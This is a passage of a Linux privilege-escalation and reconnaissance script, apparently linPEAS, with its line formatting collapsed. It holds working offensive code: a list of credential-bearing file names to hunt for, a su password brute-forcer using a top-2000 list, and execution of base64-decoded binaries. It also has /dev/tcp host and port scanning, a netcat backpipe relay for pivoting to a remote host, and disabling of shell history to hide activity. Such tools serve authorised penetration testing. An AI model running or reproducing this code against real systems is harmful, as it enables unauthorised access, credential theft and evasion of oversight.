knw_emails=".*@aivazian.fsnet.co.uk|.*@angband.pl|.*@canonical.com|.*centos.org|.*debian.net|.*debian.org|.*@jff.email|.*kali.org|.*linux.it|.*@linuxia.de|.*@lists.debian-maintainers.org|.*@mit.edu|.*@oss.sgi.com|.*@qualcomm.com|.*redhat.com|.*ubuntu.com|.*@vger.kernel.org|mmyangfl@gmail.com|rogershimizu@gmail.com|thmarques@gmail.com"
timersG="anacron.timer|apt-daily.timer|apt-daily-upgrade.timer|dpkg-db-backup.timer|e2scrub_all.timer|fstrim.timer|fwupd-refresh.timer|geoipupdate.timer|io.netplan.Netplan|logrotate.timer|man-db.timer|mlocate.timer|motd-news.timer|phpsessionclean.timer|plocate-updatedb.timer|snapd.refresh.timer|snapd.snap-repair.timer|systemd-tmpfiles-clean.timer|systemd-readahead-done.timer|ua-license-check.timer|ua-messaging.timer|ua-timer.timer|ureadahead-stop.timer"
commonrootdirsG="^/$|/bin$|/boot$|/.cache$|/cdrom|/dev$|/etc$|/home$|/lost+found$|/lib$|/lib32$|libx32$|/lib64$|lost\+found|/media$|/mnt$|/opt$|/proc$|/root$|/run$|/sbin$|/snap$|/srv$|/sys$|/tmp$|/usr$|/var$"
commonrootdirsMacG="^/$|/.DocumentRevisions-V100|/.fseventsd|/.PKInstallSandboxManager-SystemSoftware|/.Spotlight-V100|/.Trashes|/.vol|/Applications|/bin|/cores|/dev|/home|/Library|/macOS
Install Data|/net|/Network|/opt|/private|/sbin|/System|/Users|/usr|/Volumes"
ldsoconfdG="/lib32|/lib/x86_64-linux-gnu|/usr/lib32|/usr/lib/oracle/19.6/client64/lib/|/usr/lib/x86_64-linux-gnu/libfakeroot|/usr/lib/x86_64-linux-gnu|/usr/local/lib/x86_64-linux-gnu|/usr/local/lib"
dbuslistG="^:1\.[0-9\.]+|com.hp.hplip|com.intel.tss2.Tabrmd|com.redhat.ifcfgrh1|com.redhat.NewPrinterNotification|com.redhat.PrinterDriversInstaller|com.redhat.RHSM1|com.redhat.RHSM1.Facts|com.redhat.tuned|com.ubuntu.LanguageSelector|com.ubuntu.SoftwareProperties|com.ubuntu.SystemService|com.ubuntu.USBCreator|com.ubuntu.WhoopsiePreferences|io.netplan.Netplan|io.snapcraft.SnapdLoginService|fi.epitest.hostap.WPASupplicant|fi.w1.wpa_supplicant1|NAME|net.hadess.SwitcherooControl|org.blueman.Mechanism|org.bluez|org.debian.apt|org.fedoraproject.FirewallD1|org.fedoraproject.Setroubleshootd|org.fedoraproject.SetroubleshootFixit|org.fedoraproject.SetroubleshootPrivileged|org.freedesktop.Accounts|org.freedesktop.Avahi|org.freedesktop.bolt|org.freedesktop.ColorManager|org.freedesktop.DBus|org.freedesktop.DisplayManager|org.freedesktop.fwupd|org.freedesktop.GeoClue2|org.freedesktop.hostname1|org.freedesktop.import1|org.freedesktop.locale1|org.freedesktop.login1|org.freedesktop.machine1|org.freedesktop.ModemManager1|org.freedesktop.NetworkManager|org.freedesktop.network1|org.freedesktop.nm_dispatcher|org.freedesktop.nm_priv_helper|org.freedesktop.PackageKit|org.freedesktop.PolicyKit1|org.freedesktop.portable1|org.freedesktop.realmd|org.freedesktop.RealtimeKit1|org.freedesktop.SystemToolsBackends|org.freedesktop.SystemToolsBackends.[a-zA-Z0-9_]+|org.freedesktop.resolve1|org.freedesktop.systemd1|org.freedesktop.thermald|org.freedesktop.timedate1|org.freedesktop.timesync1|org.freedesktop.UDisks2|org.freedesktop.UPower|org.gnome.DisplayManager|org.opensuse.CupsPkHelper.Mechanism"
USEFUL_SOFTWARE="authbind aws az base64 ctr curl doas docker fetch g++ gcc
gcloud gdb kubectl lxc make nc nc.traditional ncat netcat nmap perl php ping
podman python python2 python2.6 python2.7 python3 python3.6 python3.7 pwsh rkt
ruby runc socat sudo wget xterm" TIP_DOCKER_ROOTLESS="In rootless mode privilege
escalation to root will not be possible."
GREP_DOCKER_SOCK_INFOS="Architecture|OSType|Name|DockerRootDir|NCPU|OperatingSystem|KernelVersion|ServerVersion"
GREP_DOCKER_SOCK_INFOS_IGNORE="IndexConfig" GREP_IGNORE_MOUNTS="/ /|/null | proc
proc |/dev/console"
INT_HIDDEN_FILES=".Xauthority|.bashrc|.bluemix|.boto|.cer|.cloudflared|.credentials.json|.crt|.csr|.db|.der|.docker|.env|.erlang.cookie|.flyrc|.ftpconfig|.git|.git-credentials|.gitconfig|.github|.gnupg|.google_authenticator|.gpg|.htpasswd|.irssi|.jks|.k5login|.kdbx|.key|.keyring|.keystore|.keytab|.kube|.ldaprc|.lesshst|.mozilla|.msmtprc|.ovpn|.p12|.password-store|.pem|.pfx|.pgp|.plan|.profile|.psk|.pub|.pypirc|.rdg|.recently-used.xbel|.rhosts|.roadtools_auth|.secrets.mkey|.service|.socket|.sqlite|.sqlite3|.sudo_as_admin_successful|.svn|.swp|.tf|.tfstate|.timer|.vault-token|.vhd|.vhdx|.viminfo|.vmdk|.vnc|.wgetrc"
########################################### #---------) Checks before start
(---------# ########################################### # --) ps working good #
--) Network binaries if [ "$(ps auxwww 2>/dev/null | wc -l 2>/dev/null)" -lt 8
]; then NOUSEPS="1" fi DISCOVER_BAN_BAD="No network discovery capabilities
(fping or ping not found)" FPING=$(command -v fping 2>/dev/null) PING=$(command
-v ping 2>/dev/null) if [ "$FPING" ]; then
DISCOVER_BAN_GOOD="$GREEN$FPING${BLUE} is available for network discovery$LG
($SCRIPTNAME can discover hosts, learn more with -h)" else if [ "$PING" ]; then
DISCOVER_BAN_GOOD="$GREEN$PING${BLUE} is available for network discovery$LG
($SCRIPTNAME can discover hosts, learn more with -h)" fi fi SCAN_BAN_BAD="No
port scan capabilities (nc and bash not found)" if [ "$(command -v bash)" ] && !
[ -L "$(command -v bash)" ]; then FOUND_BASH=$(command -v bash); elif [ -f
"/bin/bash" ] && ! [ -L "/bin/bash" ]; then FOUND_BASH="/bin/bash"; fi if [
"$FOUND_BASH" ]; then SCAN_BAN_GOOD="$YELLOW[+] $GREEN$FOUND_BASH${BLUE} is
available for network discovery, port scanning and port forwarding$LG
($SCRIPTNAME can discover hosts, scan ports, and forward ports. Learn more with
-h)\n" fi FOUND_NC=$(command -v nc 2>/dev/null) if [ -z "$FOUND_NC" ]; then
FOUND_NC=$(command -v netcat 2>/dev/null); fi if [ -z "$FOUND_NC" ]; then
FOUND_NC=$(command -v ncat 2>/dev/null); fi if [ -z "$FOUND_NC" ]; then
FOUND_NC=$(command -v nc.traditional 2>/dev/null); fi if [ -z "$FOUND_NC" ];
then FOUND_NC=$(command -v nc.openbsd 2>/dev/null); fi if [ "$FOUND_NC" ]; then
SCAN_BAN_GOOD="$SCAN_BAN_GOOD$YELLOW[+] $GREEN$FOUND_NC${BLUE} is available for
network discovery & port scanning$LG ($SCRIPTNAME can discover hosts and scan
ports, learn more with -h)\n" fi ###########################################
#-----------) Main Functions (------------#
########################################### echo_not_found (){ printf $DG"$1 Not
Found\n"$NC } warn_exec(){ $* 2>/dev/null || echo_not_found $1 } echo_no (){
printf $DG"No\n"$NC } print_title(){ if [ "$DEBUG" ]; then END_T2_TIME=$(date
+%s 2>/dev/null) if [ "$START_T2_TIME" ]; then TOTAL_T2_TIME=$(($END_T2_TIME -
$START_T2_TIME)) printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC fi
END_T1_TIME=$(date +%s 2>/dev/null) if [ "$START_T1_TIME" ]; then
TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME)) printf $DG"The total section
execution took $TOTAL_T1_TIME seconds\n"$NC echo "" fi START_T1_TIME=$(date +%s
2>/dev/null) fi title=$1 title_len=$(echo $title | wc -c) max_title_len=80
rest_len=$((($max_title_len - $title_len) / 2)) printf ${BLUE} for i in $(seq 1
$rest_len); do printf " "; done printf "╔" for i in $(seq 1 $title_len); do
printf "═"; done; printf "═"; printf "╗" echo "" for i in $(seq 1 $rest_len); do
printf "═"; done printf "╣ $GREEN${title}${BLUE} ╠" for i in $(seq 1 $rest_len);
do printf "═"; done echo "" printf ${BLUE} for i in $(seq 1 $rest_len); do
printf " "; done printf "╚" for i in $(seq 1 $title_len); do printf "═"; done;
printf "═"; printf "╝" printf $NC echo "" } print_2title(){ if [ "$DEBUG" ];
then END_T2_TIME=$(date +%s 2>/dev/null) if [ "$START_T2_TIME" ]; then
TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME)) printf $DG"This check took
$TOTAL_T2_TIME seconds\n"$NC echo "" fi START_T2_TIME=$(date +%s 2>/dev/null) fi
printf ${BLUE}"╔══════════╣ $GREEN$1\n"$NC # There are 10 "═" } print_3title(){
printf ${BLUE}"══╣ $GREEN$1\n"$NC # There are 2 "═" } print_3title_no_nl(){
printf "\033[2K\r" printf ${BLUE}"══╣ $GREEN${1}..."$NC # There are 2 "═" }
print_list(){ printf ${BLUE}"═╣ $GREEN$1"$NC # There is 1 "═" } print_info(){
printf "${BLUE}╚ ${ITALIC_BLUE}$1\n"$NC } print_ps (){ (ls -d /proc/*/
2>/dev/null | while read f; do CMDLINE=$(cat $f/cmdline 2>/dev/null | grep -av
"seds,"); # Delete my own sed processess if [ "$CMDLINE" ]; then var USER2=ls
-ld $f | awk '{print $3}'; PID=$(echo $f | cut -d "/" -f3); printf " %-13s %-8s
%s\n" "$USER2" "$PID" "$CMDLINE"; fi; done) 2>/dev/null | sort -r } su_try_pwd
(){ BFUSER=$1 PASSWORDTRY=$2 trysu=$(echo "$PASSWORDTRY" | timeout 1 su $BFUSER
-c whoami 2>/dev/null) if [ "$trysu" ]; then echo " You can login as $BFUSER
using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi }
su_brute_user_num (){ BFUSER=$1 TRIES=$2 su_try_pwd "$BFUSER" "" & # Try without
password su_try_pwd "$BFUSER" "$BFUSER" & # Try username as password su_try_pwd
"$BFUSER" "$(echo $BFUSER | rev 2>/dev/null)" & # Try reverse username as
password if [ "$PASSWORD" ]; then su_try_pwd "$BFUSER" "$PASSWORD" & # Try given
password fi for i in $(seq "$TRIES"); do su_try_pwd "$BFUSER" "$(echo
$top2000pwds | cut -d ' ' -f $i)" & # Try TOP TRIES of passwords (by default
2000) sleep 0.007 # To not overload the system done wait } check_if_su_brute(){
EXISTS_SU="$(command -v su 2>/dev/null)" error=$(echo "" | timeout 1 su
$(whoami) -c whoami 2>&1); if [ "$EXISTS_SU" ] && ! echo $error | grep -q "must
be run from a terminal"; then echo "1" fi } eval_bckgrd(){ eval "$1" &
CONT_THREADS=$(($CONT_THREADS+1)); if [ "$(($CONT_THREADS%$THREADS))" -eq "0" ];
then wait; fi } macosNotSigned(){ for filename in $1/*; do if codesign -vv -d
\"$filename\" 2>&1 | grep -q 'not signed'; then echo "$filename isn't signed" |
sed -${E} "s,.*,${SED_RED}," fi done } execBin(){ TOOL_NAME=$1 TOOL_LINK=$2
B64_BIN=$3 PARAMS=$4 if [ "$B64_BIN" ]; then echo "" print_3title "Running
$TOOL_NAME" print_info "$TOOL_LINK" echo "$B64_BIN" | base64 -d > $Wfolder/bin
chmod +x $Wfolder/bin eval "$Wfolder/bin $PARAMS" rm -f $Wfolder/bin echo "" fi
} ########################################### #---------) Internet functions
(----------# ########################################### check_tcp_80(){
(timeout -s KILL 20 /bin/bash -c '( echo >/dev/tcp/1.1.1.1/80 && echo "Port 80
is accessible" || echo "Port 80 is not accessible") 2>/dev/null | grep
"accessible"') 2>/dev/null || echo "Port 80 is not accessible" }
check_tcp_443(){ (timeout -s KILL 20 /bin/bash -c '(echo >/dev/tcp/1.1.1.1/443
&& echo "Port 443 is accessible" || echo "Port 443 is not accessible")
2>/dev/null | grep "accessible"') 2>/dev/null || echo "Port 443 is not
accessible" } check_icmp(){ (timeout -s KILL 20 /bin/bash -c '(ping -c 1 1.1.1.1
| grep "1 received" && echo "Ping is available" || echo "Ping is not available")
2>/dev/null | grep "available"') 2>/dev/null || echo "Ping is not available" } #
DNS function from:
https://unix.stackexchange.com/questions/600194/create-dns-query-with-netcat-or-dev-udp
# I cannot use this function because timeout doesn't find it, so it's
copy/pasted below check_dns(){ (timeout 20 /bin/bash -c '(( echo cfc9 0100 0001
0000 0000 0000 0a64 7563 6b64 7563 6b67 6f03 636f 6d00 0001 0001 | xxd -p -r
>&3; dd bs=9000 count=1 <&3 2>/dev/null | xxd ) 3>/dev/udp/1.1.1.1/53 && echo
"DNS available" || echo "DNS not available") 2>/dev/null | grep "available"' )
2>/dev/null || echo "DNS not available" }
########################################### #----------) Network functions
(----------# ########################################### # Adapted from
https://github.com/carlospolop/bashReconScan/blob/master/brs.sh
basic_net_info(){ print_title "Basic Network Info" (ifconfig || ip a)
2>/dev/null echo "" } select_nc (){ # Select the correct configuration of the
netcat found NC_SCAN="$FOUND_NC -v -n -z -w 1" $($NC_SCAN 127.0.0.1 65321 >
/dev/null 2>&1) if [ $? -eq 2 ] then NC_SCAN="timeout 1 $FOUND_NC -v -n" fi }
icmp_recon (){ # Discover hosts inside a /24 subnetwork using ping (start
pingging broadcast addresses) IP3=$(echo $1 | cut -d "." -f 1,2,3) (timeout 1
ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E}
"s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & (timeout 1 ping -b -c 1
"255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E}
"s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & for j in $(seq 0 254) do
(timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E}
"s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & done wait } tcp_recon (){ #
Discover hosts inside a /24 subnetwork using tcp connection to most used ports
and selected ones IP3=$(echo $1 | cut -d "." -f 1,2,3) PORTS=$2 printf
${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " printf
"$NC\n" for port in $PORTS; do for j in $(seq 1 254) do if [ "$FOUND_BASH" ] &&
[ "$TIMEOUT" ]; then $TIMEOUT 2.5 $FOUND_BASH -c "(echo </dev/tcp/$IP3.$j/$port)
2>/dev/null && echo -e \"\n[+] Open port at: $IP3.$j:$port\"" & elif [
"$NC_SCAN" ]; then ($NC_SCAN "$IP3"."$j" "$port" 2>&1 | grep -iv "Connection
refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") &
fi done wait done } tcp_port_scan (){ # Scan open ports of a host. Default: nmap
top 1000, but the user can select others basic_net_info print_title "Network
Port Scanning" IP=$1 PORTS="$2" if [ -z "$PORTS" ]; then printf
${YELLOW}"[+]${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC |
tr '\n' " " printf "$NC\n" PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30
32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113
119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280
301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497
500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631
636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783
787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993
995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027
1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043
1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059
1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075
1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091
1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110
1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138
1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183
1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247
1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352
1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583
1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761
1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971
1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010
2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047
2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144
2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381
2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607
2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920
2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071
3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324
3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546
3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828
3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000
4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343
4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003
5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190
5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500
5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802
5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907
5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998
5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112
6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667
6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002
7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625
7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007
8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086
8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290
8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800
8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081
9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485
9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917
9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012
10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629
10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000
14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016
16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315
19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502
24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000
30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776
32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572
34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080
49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167
49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636
50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600
56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680
65000 65129 65389" else PORTS="$(echo $PORTS | tr ',' ' ')" printf
${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " printf
"$NC\n" fi for port in $PORTS; do if [ "$FOUND_BASH" ]; then $FOUND_BASH -c
"(echo </dev/tcp/$IP/$port) 2>/dev/null && echo -n \"[+] Open port at:
$IP:$port\"" & elif [ "$NC_SCAN" ]; then ($NC_SCAN "$IP" "$port" 2>&1 | grep -iv
"Connection refused\|No route\|Version\|bytes\| out" | sed -${E}
"s,[0-9\.],${SED_RED},g") & fi done wait } discover_network (){ # Check if IP
and Netmask are correct and the use fping or ping to find hosts basic_net_info
print_title "Network Discovery" DISCOVERY=$1 IP=$(echo "$DISCOVERY" | cut -d "/"
-f 1) NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2) if [ -z "$IP" ] || [ -z
"$NETMASK" ]; then printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24"$NC;
printf ${BLUE}"$HELP"$NC; exit 0 fi # Using fping if possible if [ "$FPING" ];
then $FPING -a -q -g "$DISCOVERY" | sed -${E} "s,.*,${SED_RED}," # Loop using
ping else if [ "$NETMASK" -eq "24" ]; then printf ${YELLOW}"[+]$GREEN Netmask
/24 detected, starting...\n$NC" icmp_recon $IP elif [ "$NETMASK" -eq "16" ];
then printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n$NC" for i in
$(seq 1 254) do NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1 icmp_recon "$NEWIP"
done else printf $RED"[-] Err: Sorry, only Netmask /24 and /16 supported in ping
mode. Netmask detected: $NETMASK"$NC; exit 0 fi fi } discovery_port_scan (){
basic_net_info # Check if IP and Netmask are correct and the use nc to find
hosts. By default check ports: 22 80 443 445 3389 print_title "Internal Network
Discovery - Finding hosts and scanning ports" DISCOVERY=$1 MYPORTS=$2 IP=$(echo
"$DISCOVERY" | cut -d "/" -f 1) NETMASK=$(echo "$DISCOVERY" | cut -d "/" -f 2)
echo "Scanning: $DISCOVERY" if [ -z "$IP" ] || [ -z "$NETMASK" ] || [ "$IP" =
"$NETMASK" ]; then printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24\n"$NC;
if [ "$IP" = "$NETMASK" ]; then printf $RED"[*] This options is used to find
active hosts by scanning ports. If you want to perform a port scan of a host use
the options: ${YELLOW}-i <IP> [-p <PORT(s)>]\n\n"$NC; fi printf
${BLUE}"$HELP"$NC; exit 0 fi PORTS="22 80 443 445 3389 $(echo $MYPORTS | tr ','
' ')" PORTS=$(echo "$PORTS" | tr " " "\n" | sort -u) # Delete repetitions if [
"$NETMASK" -eq "24" ]; then printf ${YELLOW}"[+]$GREEN Netmask /24 detected,
starting...\n" $NC tcp_recon "$IP" "$PORTS" elif [ "$NETMASK" -eq "16" ]; then
printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n" $NC for i in
$(seq 0 255) do NEWIP=$(echo "$IP" | cut -d "." -f 1,2).$i.1 tcp_recon "$NEWIP"
"$PORTS" done else printf $RED"[-] Err: Sorry, only netmask /24 and /16 are
supported in port discovery mode. Netmask detected: $NETMASK\n"$NC; exit 0 fi }
port_forward (){ LOCAL_IP=$1 LOCAL_PORT=$2 REMOTE_IP=$3 REMOTE_PORT=$4 echo "In
your machine execute:" echo "cd /tmp; rm backpipe; mknod backpipe p;" echo "nc
-lvnp $LOCAL_PORT 0<backpipe | nc -lvnp 9009 1>backpipe" echo "" read -p "Press
any key when you have executed those commands" useless_var bash -c "exec
3<>/dev/tcp/$REMOTE_IP/$REMOTE_PORT; exec 4<>/dev/tcp/$LOCAL_IP/9009; cat <&3
>&4 & cat <&4 >&3 &" echo "If not error was indicated, your host port
$LOCAL_PORT should be forwarded to $REMOTE_IP:$REMOTE_PORT" }
########################################### #---) Exporting history env
variables (---# ########################################### unset HISTORY
HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG WATCH export HISTFILE=/dev/null
export HISTSIZE=0 export HISTFILESIZE=0
########################################### #-----------) Some Basic Info
(-----------# ########################################### print_title "Basic
information" printf $LG"OS: "$NC (cat /proc/version || uname -a ) 2>/dev/null |
sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E}
"s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
printf $LG"User & Groups: "$NC (id || (whoami && groups)) 2>/dev/null | sed
-${E} "s,$groupsB,${SED_RED},g" | sed -${E} "s,$groupsVB,${SED_RED_YELLOW},g" |
sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN},g" | sed -${E}
"s,$nosh_usrs,${SED_BLUE},g" | sed -${E} "s,$knw_usrs,${SED_GREEN},g" | sed
-${E} "s,$knw_grps,${SED_GREEN},g" | sed "s,$USER,${SED_LIGHT_MAGENTA},g" | sed
-${E} "s,$idB,${SED_RED},g" printf $LG"Hostname: "$NC hostname 2>/dev/null
printf $LG"Writable folder: "$NC; echo $Wfolder if ! [ "$FAST" ] && ! [
"$AUTO_NETWORK_SCAN" ]; then printf $LG"Remember that you can use the '-t'
option to call the Internet connectivity checks and automatic network
recon!\n"$NC; fi if [ "$DISCOVER_BAN_GOOD" ]; then printf $YELLOW"[+]
$DISCOVER_BAN_GOOD\n$NC" else printf $RED"[-] $DISCOVER_BAN_BAD\n$NC" fi if [
"$SCAN_BAN_GOOD" ]; then printf "$SCAN_BAN_GOOD\n$NC" else printf $RED"[-]
$SCAN_BAN_BAD\n$NC" fi if [ "$(command -v nmap 2>/dev/null)" ];then
NMAP_GOOD=$GREEN"nmap${BLUE} is available for network discovery & port scanning,
you should use it yourself" printf $YELLOW"[+] $NMAP_GOOD\n$NC" fi echo "" echo
"" ########################################### #--------) Check if network jobs
(--------# ########################################### if [ "$PORTS" ]; then if
[ "$SCAN_BAN_GOOD" ]; then if [ "$(echo -n $PORTS | sed 's,[0-9, ],,g')" ]; then
printf $RED"[-] Err: Symbols detected in the port, for discovering purposes
select only 1 port\n"$NC; printf ${BLUE}"$HELP"$NC; exit 0 else # Select the
correct configuration of the netcat found select_nc fi else printf $RED" Err:
Port scan not possible, any netcat in PATH\n"$NC; printf ${BLUE}"$HELP"$NC; exit
0 fi fi if [ "$DISCOVERY" ]; then if [ "$PORTS" ]; then discovery_port_scan
$DISCOVERY $PORTS else if [ "$DISCOVER_BAN_GOOD" ]; then discover_network
$DISCOVERY else printf $RED" Err: Discovery not possible, no fping or ping in
PATH\n"$NC; fi fi exit 0 elif [ "$IP" ]; then select_nc tcp_port_scan $IP
"$PORTS" exit 0 fi if [ "$PORT_FORWARD" ]; then if ! [ "$FOUND_BASH" ]; then
printf $RED"[-] Err: Port forwarding not possible, no bash in PATH\n"$NC; exit 0
fi LOCAL_IP="$(echo -n $PORT_FORWARD | cut -d ':' -f 1)" LOCAL_PORT="$(echo -n
$PORT_FORWARD | cut -d ':' -f 2)" REMOTE_IP="$(echo -n $PORT_FORWARD | cut -d
':' -f 3)" REMOTE_PORT="$(echo -n $PORT_FORWARD | cut -d ':' -f 4)" if ! [
"$LOCAL_IP" ] || ! [ "$LOCAL_PORT" ] || ! [ "$REMOTE_IP" ] || ! [ "$REMOTE_PORT"
]; then printf $RED"[-] Err: Invalid port forwarding configuration:
$PORT_FORWARD. The format is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor
example: 10.10.14.8:7777:127.0.0.1:8000"$NC; exit 0 fi # Check if LOCAL_PORT is
a number if ! [ "$(echo $LOCAL_PORT | grep -E '^[0-9]+$')" ]; then printf
$RED"[-] Err: Invalid port forwarding configuration: $PORT_FORWARD. The format
is: LOCAL_IP:LOCAL_PORT:REMOTE_IP:REMOTE_PORT\nFor example:
